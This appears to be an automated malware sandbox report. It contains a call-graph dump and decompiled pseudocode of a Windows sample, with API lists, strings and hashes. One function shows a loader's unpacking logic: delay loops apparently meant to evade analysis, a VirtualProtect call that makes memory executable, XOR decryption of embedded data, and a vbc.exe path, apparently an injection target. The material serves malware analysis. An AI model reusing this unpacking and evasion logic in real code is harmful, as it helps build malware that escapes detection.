c22bc8 19128->19134 19129->19115 19154 c1dac4 LeaveCriticalSection 19131->19154 19133 c20e6a 19133->19099 19133->19118 19137 c228f9 19134->19137 19138 c22905 ___scrt_is_nonwritable_in_current_image 19137->19138 19145 c1da7c EnterCriticalSection 19138->19145 19140 c22913 19146 c22ad8 19140->19146 19145->19140 19147 c22af7 19146->19147 19148 c22920 19146->19148 19147->19148 19149 c22f9f _free 14 API calls 19147->19149 19150 c22948 19148->19150 19149->19148 19153 c1dac4 LeaveCriticalSection 19150->19153 19152 c22931 19152->19129 19153->19152 19154->19133 19156 c20fe6 19155->19156 19157 c2b3d4 19155->19157 19156->19121 19156->19122 19159 c25554 19157->19159 19160 c254d1 std::_Locinfo::_Locinfo_dtor 5 API calls 19159->19160 19161 c25570 19160->19161 19161->19156 19163 c22d69 19162->19163 19165 c22d7b ___scrt_uninitialize_crt 19162->19165 19164 c22d77 19163->19164 19167 c1e933 19163->19167 19164->18175 19165->18175 19170 c1e7e1 19167->19170 19173 c1e6d5 19170->19173 19174 c1e6e1 ___scrt_is_nonwritable_in_current_image 19173->19174 19181 c1da7c EnterCriticalSection 19174->19181 19176 c1e757 19190 c1e775 19176->19190 19177 c1e6eb ___scrt_uninitialize_crt 19177->19176 19182 c1e649 19177->19182 19181->19177 19183 c1e655 ___scrt_is_nonwritable_in_current_image 19182->19183 19193 c1deae EnterCriticalSection 19183->19193 19185 c1e65f ___scrt_uninitialize_crt 19186 c1e698 19185->19186 19194 c1e8eb 19185->19194 19204 c1e6c9 19186->19204 19237 c1dac4 LeaveCriticalSection 19190->19237 19192 c1e763 19192->19164 19193->19185 19195 c1e901 19194->19195 19196 c1e8f8 19194->19196 19198 c1e886 ___scrt_uninitialize_crt 62 API calls 19195->19198 19197 c1e7e1 ___scrt_uninitialize_crt 66 API calls 19196->19197 19200 c1e8fe 19197->19200 19199 c1e907 19198->19199 19199->19200 19201 c2441e _Fputc 25 API calls 19199->19201 19200->19186 19202 c1e91d 19201->19202 19207 c26b33 19202->19207 19236 c1dec2 LeaveCriticalSection 19204->19236 19206 c1e6b7 19206->19177 19208 c26b51 19207->19208 19209 c26b44 19207->19209 19211 c26b9a 19208->19211 19213 c26b78 19208->19213 19210 c1da28 __dosmaperr 14 API calls 19209->19210 19217 c26b49 19210->19217 19212 c1da28 __dosmaperr 14 API calls 19211->19212 19214 c26b9f 19212->19214 19218 c26a91 19213->19218 19216 c1d94e __strnicoll 25 API calls 19214->19216 19216->19217 19217->19200 19219 c26a9d ___scrt_is_nonwritable_in_current_image 19218->19219 19232 c2b539 EnterCriticalSection 19219->19232 19221 c26aac 19222 c26af3 19221->19222 19224 c2b610 ___scrt_uninitialize_crt 25 API calls 19221->19224 19223 c1da28 __dosmaperr 14 API calls 19222->19223 19225 c26af8 19223->19225 19226 c26ad8 FlushFileBuffers 19224->19226 19233 c26b27 19225->19233 19226->19225 19227 c26ae4 19226->19227 19228 c1da15 __dosmaperr 14 API calls 19227->19228 19230 c26ae9 GetLastError 19228->19230 19230->19222 19232->19221 19234 c2b55c ___scrt_uninitialize_crt LeaveCriticalSection 19233->19234 19235 c26b10 19234->19235 19235->19217 19236->19206 19237->19192 19238 c2642c 19239 c2441e _Fputc 25 API calls 19238->19239 19240 c26439 19239->19240 19241 c26461 19240->19241 19242 c26445 19240->19242 19244 c2646f 19241->19244 19245 c2647c 19241->19245 19243 c1da28 __dosmaperr 14 API calls 19242->19243 19246 c2644a 19243->19246 19247 c1da28 __dosmaperr 14 API calls 19244->19247 19252 c2648f 19245->19252 19267 c267aa 19245->19267 19247->19246 19249 c24483 25 API calls 19253 c264e4 19249->19253 19252->19246 19252->19249 19255 c264f1 19252->19255 19253->19255 19275 c26845 19253->19275 19256 c26610 19255->19256 19257 c2441e _Fputc 25 API calls 19256->19257 19258 c2661f 19257->19258 19259 c266c2 19258->19259 19260 c26632 19258->19260 19261 c2732b ___scrt_uninitialize_crt 62 API calls 19259->19261 19262 c2664f 19260->19262 19264 c26673 19260->19264 19266 c264ff 19261->19266 19263 c2732b ___scrt_uninitialize_crt 62 API calls 19262->19263 19263->19266 19264->19266 19280 c27d66 19264->19280 19268 c267c0 19267->19268 19269 c267c4 19267->19269 19268->19252 19270 c2b610 ___scrt_uninitialize_crt 25 API calls 19269->19270 19274 c26813 19269->19274 19271 c267e5 19270->19271 19272 c267ed SetFilePointerEx 19271->19272 19271->19274 19273 c26804 GetFileSizeEx 19272->19273 19272->19274 19273->19274 19274->19252 19276 c22f42 __dosmaperr 14 API calls 19275->19276 19277 c26862 19276->19277 19278 c22f9f _free 14 API calls 19277->19278 19279 c2686c 19278->19279 19279->19255 19283 c27bde 19280->19283 19284 c27bea ___scrt_is_nonwritable_in_current_image 19283->19284 19285 c27bf2 19284->19285 19286 c27c0a 19284->19286 19288 c1da15 __dosmaperr 14 API calls 19285->19288 19287 c27cbb 19286->19287 19291 c27c3f 19286->19291 19289 c1da15 __dosmaperr 14 API calls 19287->19289 19290 c27bf7 19288->19290 19292 c27cc0 19289->19292 19293 c1da28 __dosmaperr 14 API calls 19290->19293 19308 c2b539 EnterCriticalSection 19291->19308 19295 c1da28 __dosmaperr 14 API calls 19292->19295 19307 c27bff 19293->19307 19297 c27cc8 19295->19297 19296 c27c45 19298 c27c69 19296->19298 19299 c27c7e 19296->19299 19300 c1d94e __strnicoll 25 API calls 19297->19300 19301 c1da28 __dosmaperr 14 API calls 19298->19301 19302 c27cea ___scrt_uninitialize_crt 27 API calls 19299->19302 19300->19307 19303 c27c6e 19301->19303 19304 c27c79 19302->19304 19305 c1da15 __dosmaperr 14 API calls 19303->19305 19309 c27cb3 19304->19309 19305->19304 19307->19266 19308->19296 19312 c2b55c LeaveCriticalSection 19309->19312 19311 c27cb9 19311->19307 19312->19311

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 76 c120e0-c12102 77 c12103-c1210a 76->77 78 c12113-c12119 77->78 79 c1210c-c12111 77->79 80 c12244-c1227e 78->80 81 c1211f-c12161 call c122a0 call c14630 78->81 79->77 79->78 82 c12283-c12284 80->82 90 c12163-c1216a 81->90 91 c12174-c121b1 call c15060 call c13d30 GetModuleHandleW GetProcAddress VirtualProtect 81->91 82->82 84 c12286-c1228b 82->84 90->91 95 c1216c-c12170 90->95 98 c121b3-c121b7 91->98 95->91 98->98 99 c121b9-c121c1 98->99 100 c121c3 99->100 101 c121f9-c121fe 99->101 102 c121c5-c121d2 GetForegroundWindow call c1d685 100->102 103 c12200-c12204 101->103 106 c121d7-c121f7 102->106 103->103 105 c12206-c12208 103->105 105->80 107 c1220a-c1220c 105->107 106->101 106->102 108 c12210-c1221d GetForegroundWindow call c1d685 107->108 110 c12222-c12242 108->110 110->80 110->108
                                                C-Code - Quality: 67%
                                                			E00C120E0(void* __ebx, void* __edi, void* __esi) {
                                                				signed int _v8;
                                                				long _v16;
                                                				intOrPtr _v20;
                                                				long _v24;
                                                				intOrPtr* _v28;
                                                				char _v32;
                                                				signed int _t33;
                                                				intOrPtr _t35;
                                                				intOrPtr* _t40;
                                                				intOrPtr* _t43;
                                                				signed short _t44;
                                                				signed int _t50;
                                                				signed int _t51;
                                                				signed int _t53;
                                                				signed int _t59;
                                                				intOrPtr* _t65;
                                                				signed int _t70;
                                                				intOrPtr* _t76;
                                                				intOrPtr* _t79;
                                                				long _t86;
                                                				signed int _t103;
                                                				signed int _t108;
                                                				signed int _t109;
                                                				signed int _t112;
                                                				void* _t113;
                                                				void* _t114;
                                                
                                                				_t99 = __edi;
                                                				_t67 = __ebx;
                                                				_t113 = _t112 - 0x1c;
                                                				_t33 =  *0xc42014; // 0x4fdfcf70
                                                				_v8 = _t33 ^ _t112;
                                                				_push(__ebx);
                                                				asm("xorps xmm0, xmm0");
                                                				_t70 = 0;
                                                				asm("movlpd [ebp-0x10], xmm0");
                                                				_t86 = _v16;
                                                				_t35 = _v20;
                                                				_push(__edi);
                                                				do {
                                                					_t70 = _t70 + 1;
                                                					_t35 = _t35 + 1;
                                                					asm("adc edx, 0x0");
                                                				} while (_t35 == 0 && _t35 < 0x5f5e100);
                                                				if(_t70 < 0x5f5e100) {
                                                					L17:
                                                					 *0xc99848 = L"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe";
                                                					_v24 = 0;
                                                					_push(0xc42a60);
                                                					_push(0);
                                                					asm("stosd");
                                                					_push(_v24);
                                                					asm("loop 0xffffffff");
                                                					_push(0);
                                                					_push(0xc97e60);
                                                					return 0xc97e82;
                                                				}
                                                				_v16 = 0;
                                                				_t40 = E00C122A0(_t86, _t70);
                                                				_t107 = _t40;
                                                				_t76 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t40 + 4)) + _t40 + 0x30)) + 4));
                                                				_v28 = _t76;
                                                				 *((intOrPtr*)( *_t76 + 4))();
                                                				_t43 = E00C14630(_t67,  *_t76, _t99);
                                                				_t114 = _t113 + 4;
                                                				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *_t43 + 0x30))))(0xa,  &_v32);
                                                				_t79 = _v28;
                                                				_t103 = _t44 & 0x0000ffff;
                                                				if(_t79 != 0) {
                                                					_t65 =  *((intOrPtr*)( *_t79 + 8))();
                                                					if(_t65 != 0) {
                                                						 *((intOrPtr*)( *_t65))(1);
                                                					}
                                                				}
                                                				E00C15060(_t107, _t103); // executed
                                                				E00C13D30(_t107);
                                                				GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "VirtualProtect");
                                                				VirtualProtect(0xc97e60, 0x181, 0x40,  &_v16); // executed
                                                				_t83 = 0x5f5e100;
                                                				_t50 = 0x5f5e100;
                                                				do {
                                                					_t50 = _t50 - 1;
                                                					_t83 = _t83 - 1;
                                                				} while (_t50 > 0);
                                                				if(_t83 != 0) {
                                                					L12:
                                                					_t84 = 0x5f5e100;
                                                					_t51 = 0x5f5e100;
                                                					do {
                                                						_t51 = _t51 - 1;
                                                						_t84 = _t84 - 1;
                                                					} while (_t51 > 0);
                                                					if(_t84 != 0) {
                                                						goto L17;
                                                					}
                                                					_t108 = 0;
                                                					do {
                                                						GetForegroundWindow();
                                                						_t23 = _t108 + 0xc42a60; // 0x905a4d
                                                						_t53 = E00C1D685(_t84, "4");
                                                						_t84 = _t53;
                                                						_t114 = _t114 + 4;
                                                						_t28 = _t108 % _t53 + 0xc3f72c; // 0x37bdd1c8
                                                						 *(_t108 + 0xc42a60) =  *_t28 ^  *_t23;
                                                						_t108 = _t108 + 1;
                                                					} while (_t108 < 0x55400);
                                                					goto L17;
                                                				}
                                                				_t109 = 0; // executed
                                                				do {
                                                					GetForegroundWindow();
                                                					_t16 = 0xc97e60 + _t109; // 0x8bec8b55
                                                					_t59 = E00C1D685(_t83, "4");
                                                					_t83 = _t59;
                                                					_t114 = _t114 + 4;
                                                					_t21 = _t109 % _t59 + 0xc3f72c; // 0x37bdd1c8
                                                					 *(0xc97e60 + _t109) =  *_t21 ^  *_t16;
                                                					_t109 = _t109 + 1;
                                                				} while (_t109 < 0x77e);
                                                				goto L12;
                                                			}





























                                                0x00c120e0
                                                0x00c120e0
                                                0x00c120e3
                                                0x00c120e6
                                                0x00c120ed
                                                0x00c120f0
                                                0x00c120f1
                                                0x00c120f4
                                                0x00c120f7
                                                0x00c120fc
                                                0x00c120ff
                                                0x00c12102
                                                0x00c12103
                                                0x00c12103
                                                0x00c12104
                                                0x00c12107
                                                0x00c12107
                                                0x00c12119
                                                0x00c12244
                                                0x00c12244
                                                0x00c1224e
                                                0x00c1225c
                                                0x00c12261
                                                0x00c1226d
                                                0x00c12271
                                                0x00c12284
                                                0x00c12288
                                                0x00c1228a
                                                0x00c1228b
                                                0x00c1228b
                                                0x00c12120
                                                0x00c12127
                                                0x00c1212c
                                                0x00c12137
                                                0x00c1213a
                                                0x00c1213f
                                                0x00c12146
                                                0x00c1214b
                                                0x00c12157
                                                0x00c12159
                                                0x00c1215c
                                                0x00c12161
                                                0x00c12165
                                                0x00c1216a
                                                0x00c12172
                                                0x00c12172
                                                0x00c1216a
                                                0x00c12177
                                                0x00c1217e
                                                0x00c12194
                                                0x00c121aa
                                                0x00c121ac
                                                0x00c121b1
                                                0x00c121b3
                                                0x00c121b3
                                                0x00c121b4
                                                0x00c121b5
                                                0x00c121c1
                                                0x00c121f9
                                                0x00c121f9
                                                0x00c121fe
                                                0x00c12200
                                                0x00c12200
                                                0x00c12201
                                                0x00c12202
                                                0x00c12208
                                                0x00000000
                                                0x00000000
                                                0x00c1220a
                                                0x00c12210
                                                0x00c12210
                                                0x00c12212
                                                0x00c1221d
                                                0x00c12222
                                                0x00c12228
                                                0x00c1222d
                                                0x00c12235
                                                0x00c1223b
                                                0x00c1223c
                                                0x00000000
                                                0x00c12210
                                                0x00c121c3
                                                0x00c121c5
                                                0x00c121c5
                                                0x00c121c7
                                                0x00c121d2
                                                0x00c121d7
                                                0x00c121dd
                                                0x00c121e2
                                                0x00c121ea
                                                0x00c121f0
                                                0x00c121f1
                                                0x00000000

                                                APIs
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,VirtualProtect), ref: 00C1218D
                                                • GetProcAddress.KERNEL32(00000000), ref: 00C12194
                                                • VirtualProtect.KERNELBASE(00C97E60,00000181,00000040,00000000), ref: 00C121AA
                                                • GetForegroundWindow.USER32 ref: 00C121C5
                                                • GetForegroundWindow.USER32 ref: 00C12210
                                                Strings
                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, xrefs: 00C12244
                                                • VirtualProtect, xrefs: 00C12183
                                                • kernel32.dll, xrefs: 00C12188
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ForegroundWindow$AddressHandleModuleProcProtectVirtual
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe$VirtualProtect$kernel32.dll
                                                • API String ID: 2777738789-3885883469
                                                • Opcode ID: 4ab86420b80f337da6f7540de6da191faff49eb03a71710bf468eb37f66dff49
                                                • Instruction ID: 8a5b404e64f53a717bf388b8974e03809c40c24e6910961a62a2fd5c0c373c99
                                                • Opcode Fuzzy Hash: 4ab86420b80f337da6f7540de6da191faff49eb03a71710bf468eb37f66dff49
                                                • Instruction Fuzzy Hash: F1413835B106045BDB0CDB78CC56BAEF7B6EF8A300F14856CE54AD73A0DA70AD829790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00C17C6E() {
                                                				_Unknown_base(*)()* _t1;
                                                
                                                				_t1 = SetUnhandledExceptionFilter(E00C17C7A); // executed
                                                				return _t1;
                                                			}




                                                0x00c17c73
                                                0x00c17c79

                                                APIs
                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00007C7A,00C172BA), ref: 00C17C73
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.443436477.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                • Associated: 0000000C.00000002.443279176.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443765227.0000000000C34000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444652620.0000000000C97000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444675545.0000000000C98000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 0000000C.00000002.444742097.0000000000C9A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_c10000_8F68.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: e3b6bc09d8fc65a67dc7cf219ec97eef70baf16b11b9d2eee045c4af59e9c6b7
                                                • Instruction ID: 713ecabe8a5377ba4a548ee722460c3f17238a1dd88b215ad96267aa76dcee51
                                                • Opcode Fuzzy Hash: e3b6bc09d8fc65a67dc7cf219ec97eef70baf16b11b9d2eee045c4af59e9c6b7
                                                • Instruction Fuzzy Hash:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                C-Code - Quality: 71%
                                                			E00C14630(void* __ebx, void* __edx, void* __edi, intOrPtr _a4) {
                                                				signed int _v4;
                                                				char _v8;
                                                				char _v12;
                                                				char _v60;
                                                				char _v76;
                                                				intOrPtr _v84;
                                                				signed int _v88;
                                                				signed int _v92;
                                                				signed int _v96;
                                                				signed int _v100;
                                                				signed int _v104;
                                                				signed int _v108;
                                                				signed int _v112;
                                                				signed int _v116;
                                                				signed int _v120;
                                                				signed int _v124;
                                                				signed int _v128;
                                                				signed int _v132;
                                                				intOrPtr _v140;
                                                				intOrPtr _v144;
                                                				void* __esi;
                                                				signed int _t62;
                                                				signed int _t70;
                                                				intOrPtr _t74;
                                                				int _t79;
                                                				void* _t88;
                                                				signed int _t92;
                                                				signed int _t93;
                                                				signed int _t94;
                                                				signed int _t95;
                                                				signed int _t96;
                                                				signed int _t97;
                                                				void* _t108;
                                                				signed int _t113;
                                                				signed int _t114;
                                                				intOrPtr _t116;
                                                				signed int _t117;
                                                				void* _t118;
                                                				intOrPtr _t120;
                                                				intOrPtr _t125;
                                                				void* _t132;
                                                				intOrPtr _t133;
                                                				signed int _t135;
                                                				void* _t136;
                                                				signed int _t137;
                                                				signed int _t139;
                                                				void* _t140;
                                                				signed int _t141;
                                                				signed int _t145;
                                                				void* _t149;
                                                				signed int _t150;
                                                				void* _t152;
                                                				void* _t157;
                                                				void* _t159;
                                                
                                                				_t132 = __edx;
                                                				_t150 = _t149 - 0x88;
                                                				_t62 =  *0xc42014; // 0x4fdfcf70
                                                				_v4 = _t62 ^ _t150;
                                                				_push(__ebx);
                                                				_t116 = _a4;
                                                				_push(__edi);
                                                				_v84 = _t116;
                                                				E00C153B9( &_v12, 0);
                                                				_t135 =  *0xc98b64; // 0x1
                                                				_t145 =  *0xc99840; // 0x166e9d0
                                                				if(_t135 == 0) {
                                                					E00C153B9( &_v8, _t135);
                                                					_t159 =  *0xc98b64 - _t135; // 0x1
                                                					if(_t159 == 0) {
                                                						_t113 =  *0xc98b50; // 0x3
                                                						_t114 = _t113 + 1;
                                                						 *0xc98b50 = _t114;
                                                						 *0xc98b64 = _t114;
                                                					}
                                                					E00C15411( &_v8);
                                                					_t135 =  *0xc98b64; // 0x1
                                                				}
                                                				_t120 =  *((intOrPtr*)(_t116 + 4));
                                                				_t117 = _t135 * 4;
                                                				if(_t135 >=  *((intOrPtr*)(_t120 + 0xc))) {
                                                					_t139 = 0;
                                                					__eflags = 0;
                                                					goto L8;
                                                				} else {
                                                					_t139 =  *(_t117 +  *((intOrPtr*)(_t120 + 8)));
                                                					if(_t139 == 0) {
                                                						L8:
                                                						__eflags =  *((char*)(_t120 + 0x14));
                                                						if( *((char*)(_t120 + 0x14)) == 0) {
                                                							L11:
                                                							__eflags = _t139;
                                                							if(_t139 != 0) {
                                                								goto L6;
                                                							} else {
                                                								goto L12;
                                                							}
                                                						} else {
                                                							_t108 = E00C15706();
                                                							__eflags = _t135 -  *((intOrPtr*)(_t108 + 0xc));
                                                							if(_t135 >=  *((intOrPtr*)(_t108 + 0xc))) {
                                                								L12:
                                                								__eflags = _t145;
                                                								if(__eflags == 0) {
                                                									_t139 = E00C171A1(_t139, __eflags, 0x44);
                                                									_t152 = _t150 + 4;
                                                									_t70 =  *(_v84 + 4);
                                                									__eflags = _t70;
                                                									if(_t70 == 0) {
                                                										_t137 = 0xc3f5cf;
                                                									} else {
                                                										_t137 =  *(_t70 + 0x18);
                                                										__eflags = _t137;
                                                										if(_t137 == 0) {
                                                											_t137 = _t70 + 0x1c;
                                                										}
                                                									}
                                                									E00C153B9( &_v132, 0);
                                                									_v132 = 0;
                                                									_v128 = 0;
                                                									_v124 = 0;
                                                									_v120 = 0;
                                                									_v116 = 0;
                                                									_v112 = 0;
                                                									_v108 = 0;
                                                									_v104 = 0;
                                                									_v100 = 0;
                                                									_v96 = 0;
                                                									_v92 = 0;
                                                									_v88 = 0;
                                                									__eflags = _t137;
                                                									if(_t137 == 0) {
                                                										E00C15580("bad locale name");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										_t125 = _v140;
                                                										_t74 = _v144;
                                                										__eflags = _t125 - 0x1000;
                                                										if(_t125 < 0x1000) {
                                                											L36:
                                                											_v140 = _t125;
                                                											_v144 = _t74;
                                                											_push(_t145);
                                                											return L00C179FA(_v144);
                                                										} else {
                                                											_t133 =  *((intOrPtr*)(_t74 - 4));
                                                											_t125 = _t125 + 0x23;
                                                											__eflags = _t74 - _t133 + 0xfffffffc - 0x1f;
                                                											if(__eflags > 0) {
                                                												_push(_t139);
                                                												_t141 = _t139 ^ _t139;
                                                												E00C1D8EA(_t125, _t141, __eflags, _t141, _t141, _t141, _t141, _t141);
                                                												_push(_t141);
                                                												_push(_t141);
                                                												_push(_t141);
                                                												_push(_t141);
                                                												_push(_t141);
                                                												L40();
                                                												asm("int3");
                                                												_t79 = IsProcessorFeaturePresent(0x17);
                                                												__eflags = _t79;
                                                												if(_t79 != 0) {
                                                													_push(5);
                                                													asm("int 0x29");
                                                												}
                                                												_push(_t141);
                                                												E00C1D7A2(_t117, _t133, 0xc0000417, 2, 0xc0000417, 1);
                                                												return TerminateProcess(GetCurrentProcess(), 0xc0000417);
                                                											} else {
                                                												_t74 = _t133;
                                                												goto L36;
                                                											}
                                                										}
                                                									} else {
                                                										E00C1580C( &_v132,  &_v132, _t137); // executed
                                                										 *(_t139 + 4) = 0;
                                                										 *_t139 = 0xc342ac;
                                                										E00C16D84(_t137, _t139, __eflags,  &_v76);
                                                										asm("movups xmm0, [eax]");
                                                										asm("movups [esi+0x8], xmm0");
                                                										_t88 = E00C16DEF(__eflags,  &_v60);
                                                										asm("movups xmm0, [eax]");
                                                										asm("movups [esi+0x18], xmm0");
                                                										asm("movups xmm0, [eax+0x10]");
                                                										asm("movups [esi+0x28], xmm0");
                                                										asm("movq xmm0, [eax+0x20]");
                                                										asm("movq [esi+0x38], xmm0");
                                                										 *((intOrPtr*)(_t139 + 0x40)) =  *((intOrPtr*)(_t88 + 0x28));
                                                										E00C15857( &_v132,  &_v132);
                                                										_t92 = _v88;
                                                										_t157 = _t152 + 0x14;
                                                										__eflags = _t92;
                                                										if(_t92 != 0) {
                                                											E00C1CD40(_t92);
                                                											_t157 = _t157 + 4;
                                                										}
                                                										_t93 = _v96;
                                                										_v88 = 0;
                                                										__eflags = _t93;
                                                										if(_t93 != 0) {
                                                											E00C1CD40(_t93);
                                                											_t157 = _t157 + 4;
                                                										}
                                                										_t94 = _v104;
                                                										_v96 = 0;
                                                										__eflags = _t94;
                                                										if(_t94 != 0) {
                                                											E00C1CD40(_t94);
                                                											_t157 = _t157 + 4;
                                                										}
                                                										_t95 = _v112;
                                                										_v104 = 0;
                                                										__eflags = _t95;
                                                										if(_t95 != 0) {
                                                											E00C1CD40(_t95);
                                                											_t157 = _t157 + 4;
                                                										}
                                                										_t96 = _v120;
                                                										_v112 = 0;
                                                										__eflags = _t96;
                                                										if(_t96 != 0) {
                                                											E00C1CD40(_t96);
                                                											_t157 = _t157 + 4;
                                                										}
                                                										_t97 = _v128;
                                                										_v120 = 0;
                                                										__eflags = _t97;
                                                										if(_t97 != 0) {
                                                											E00C1CD40(_t97);
                                                											_t157 = _t157 + 4;
                                                										}
                                                										_v128 = 0;
                                                										E00C15411( &_v132);
                                                										E00C156DA(__eflags, _t139);
                                                										_t150 = _t157 + 4;
                                                										 *((intOrPtr*)( *_t139 + 4))();
                                                										 *0xc99840 = _t139;
                                                										goto L6;
                                                									}
                                                								} else {
                                                									_t139 = _t145;
                                                									goto L6;
                                                								}
                                                							} else {
                                                								_t139 =  *(_t117 +  *((intOrPtr*)(_t108 + 8)));
                                                								goto L11;
                                                							}
                                                						}
                                                					} else {
                                                						L6:
                                                						E00C15411( &_v12);
                                                						_pop(_t136);
                                                						_pop(_t140);
                                                						_pop(_t118);
                                                						return E00C17193(_t139, _t118, _v4 ^ _t150, _t132, _t136, _t140);
                                                					}
                                                				}
                                                			}

























































                                                0x00c14630
                                                0x00c14630
                                                0x00c14636
                                                0x00c1463d
                                                0x00c14644
                                                0x00c14645
                                                0x00c14655
                                                0x00c14658
                                                0x00c1465c
                                                0x00c14661
                                                0x00c14667
                                                0x00c1466f
                                                0x00c14679
                                                0x00c1467e
                                                0x00c14684
                                                0x00c14686
                                                0x00c1468b
                                                0x00c1468c
                                                0x00c14691
                                                0x00c14691
                                                0x00c1469d
                                                0x00c146a2
                                                0x00c146a2
                                                0x00c146a8
                                                0x00c146ab
                                                0x00c146b5
                                                0x00c146e8
                                                0x00c146e8
                                                0x00000000
                                                0x00c146b7
                                                0x00c146ba
                                                0x00c146bf
                                                0x00c146ea
                                                0x00c146ea
                                                0x00c146ee
                                                0x00c14700
                                                0x00c14700
                                                0x00c14702
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00c146f0
                                                0x00c146f0
                                                0x00c146f5
                                                0x00c146f8
                                                0x00c14704
                                                0x00c14704
                                                0x00c14706
                                                0x00c14713
                                                0x00c14715
                                                0x00c1471c
                                                0x00c1471f
                                                0x00c14721
                                                0x00c1472f
                                                0x00c14723
                                                0x00c14723
                                                0x00c14726
                                                0x00c14728
                                                0x00c1472a
                                                0x00c1472a
                                                0x00c14728
                                                0x00c1473a
                                                0x00c14741
                                                0x00c14749
                                                0x00c1474e
                                                0x00c14756
                                                0x00c1475b
                                                0x00c14763
                                                0x00c14768
                                                0x00c1476c
                                                0x00c14771
                                                0x00c14775
                                                0x00c14779
                                                0x00c1477d
                                                0x00c14781
                                                0x00c14783
                                                0x00c148ad
                                                0x00c148b2
                                                0x00c148b3
                                                0x00c148b4
                                                0x00c148b5
                                                0x00c148b6
                                                0x00c148b7
                                                0x00c148b8
                                                0x00c148b9
                                                0x00c148ba
                                                0x00c148bb
                                                0x00c148bc
                                                0x00c148bd
                                                0x00c148be
                                                0x00c148bf
                                                0x00c148c0
                                                0x00c148c4
                                                0x00c148c8
                                                0x00c148ce
                                                0x00c148e2
                                                0x00c148e2
                                                0x00c148e6
                                                0x00c171d1
                                                0x00c171de
                                                0x00c148d0
                                                0x00c148d0
                                                0x00c148d3
                                                0x00c148db
                                                0x00c148de
                                                0x00c1d960
                                                0x00c1d961
                                                0x00c1d968
                                                0x00c1d970
                                                0x00c1d971
                                                0x00c1d972
                                                0x00c1d973
                                                0x00c1d974
                                                0x00c1d975
                                                0x00c1d97a
                                                0x00c1d97d
                                                0x00c1d983
                                                0x00c1d985
                                                0x00c1d987
                                                0x00c1d98a
                                                0x00c1d98a
                                                0x00c1d98c
                                                0x00c1d997
                                                0x00c1d9ae
                                                0x00c148e0
                                                0x00c148e0
                                                0x00000000
                                                0x00c148e0
                                                0x00c148de
                                                0x00c14789
                                                0x00c1478f
                                                0x00c14798
                                                0x00c147a0
                                                0x00c147a6
                                                0x00c147ae
                                                0x00c147b6
                                                0x00c147ba
                                                0x00c147c2
                                                0x00c147c5
                                                0x00c147c9
                                                0x00c147cd
                                                0x00c147d1
                                                0x00c147d6
                                                0x00c147de
                                                0x00c147e6
                                                0x00c147eb
                                                0x00c147ef
                                                0x00c147f2
                                                0x00c147f4
                                                0x00c147f7
                                                0x00c147fc
                                                0x00c147fc
                                                0x00c147ff
                                                0x00c14803
                                                0x00c1480b
                                                0x00c1480d
                                                0x00c14810
                                                0x00c14815
                                                0x00c14815
                                                0x00c14818
                                                0x00c1481c
                                                0x00c14824
                                                0x00c14826
                                                0x00c14829
                                                0x00c1482e
                                                0x00c1482e
                                                0x00c14831
                                                0x00c14835
                                                0x00c1483d
                                                0x00c1483f
                                                0x00c14842
                                                0x00c14847
                                                0x00c14847
                                                0x00c1484a
                                                0x00c1484e
                                                0x00c14856
                                                0x00c14858
                                                0x00c1485b
                                                0x00c14860
                                                0x00c14860
                                                0x00c14863
                                                0x00c14867
                                                0x00c1486f
                                                0x00c14871
                                                0x00c14874
                                                0x00c14879
                                                0x00c14879
                                                0x00c14880
                                                0x00c14888
                                                0x00c1488e
                                                0x00c14895
                                                0x00c1489a
                                                0x00c1489d
                                                0x00000000
                                                0x00c1489d
                                                0x00c14708
                                                0x00c14708
                                                0x00000000
                                                0x00c14708
                                                0x00c146fa
                                                0x00c146fd
                                                0x00000000
                                                0x00c146fd
                                                0x00c146f8
